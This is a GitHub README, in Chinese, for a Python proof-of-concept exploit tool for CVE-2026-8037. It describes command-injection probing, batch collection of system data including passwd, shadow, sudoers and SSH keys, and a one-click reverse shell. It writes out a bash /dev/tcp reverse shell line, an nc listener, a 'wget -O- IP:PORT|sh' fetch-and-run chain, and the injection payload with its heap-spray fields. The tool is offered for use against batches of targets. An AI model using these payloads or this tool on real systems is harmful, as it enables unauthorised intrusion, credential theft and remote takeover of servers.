Caster-chen/CVE-2026-8037-POC

GitHub: Caster-chen/CVE-2026-8037-POC

针对特定编号漏洞的 Python 利用工具,提供命令注入探测、批量信息收集与一键反弹 Shell 功能。

Stars: 0 | Forks: 0

# CVE-2026-8037-POC 包括能执行的命令探测和一键getshell(需要服务器部署服务) pco.yaml 配合nuclei可以快速探测 ## 快速开始 ### 交互模式 python go.py 输入目标 URL → 选功能菜单即可。 ### 探测目标 # 快速探测(8 项基本信息) python go.py -t https://IP:PORT --probe fast # 深度探测(全部命令:30+ 项) python go.py -t https://IP:PORT --probe deep # 批量探测 python go.py -f vulnerable_targets.txt --probe fast ### 执行命令 python go.py -t https://IP:PORT -c "hostname" python go.py -t https://IP:PORT -c "ls -la /root" python go.py -t https://IP:PORT -c "cat /etc/passwd" # 批量并发(20 线程) python go.py -f targets.txt -c "hostname" --batch 20 ### 一键反弹 Shell 在攻击机开两个终端: # 终端 1 - HTTP 服务(提供 rev.sh) echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html python3 -m http.server 8087 # 终端 2 - 等待反弹 nc -lvnp 8088 然后发 payload: # 单目标 python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088 # 批量(串行,一次只能接一个) python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088 脚本发送前会打印准备步骤。 ## 深度探测内容 | 类别 | 命令 | |------|------| | 基本信息 | hostname, uname -a, kernel, OS release, uptime | | 用户 | id, whoami, users/w/who | | 网络 | ifconfig, route, arp, listening ports, connections, iptables | | 系统 | processes, cpuinfo, meminfo, disk, mount | | 文件 | ls / /root /tmp /home /etc | | 配置 | crontab, passwd, shadow, sudoers, SSH keys | | 扩展 | config search, scripts, docker, containers | ## 注入原理 {"cmd":"getall","apiuser":"''''","apipass":"BBBBB", "g0":"AAAAAAAAAAAAAAAA'; <命令> #", ...} - `apiuser="''''"` 触发 escape_quotes() 未 null 终止缺陷 - `g0~g60` 堆喷射 61 次,提高成功率 - `'; <命令> #` 闭合上下文,`#` 注释后续 ### 长度限制 不用 echo tag 可用 34 字符: wget -O- IP:PORT|sh (31 字符) 管道链:wget 下载 → sh 执行 → bash 反弹回指定端口。 ## 参数一览 | 参数 | 作用 | |------|------| | `-t, --target URL` | 目标地址 | | `-f, --file FILE` | 目标列表文件 | | `-l, --lhost IP` | 攻击机 IP | | `-p, --lport PORT` | HTTP 服务端口 (默认 8087) | | `-n, --ncport PORT` | nc 监听端口 (默认 8088) | | `-c, --cmd CMD` | 执行命令 | | `--probe fast/deep` | 快速/深度探测 | | `--batch N` | 批量并发数 (默认串行) |
标签:Google, Nuclei, Python, 命令注入, 插件系统, 无后门, 无线安全, 逆向工具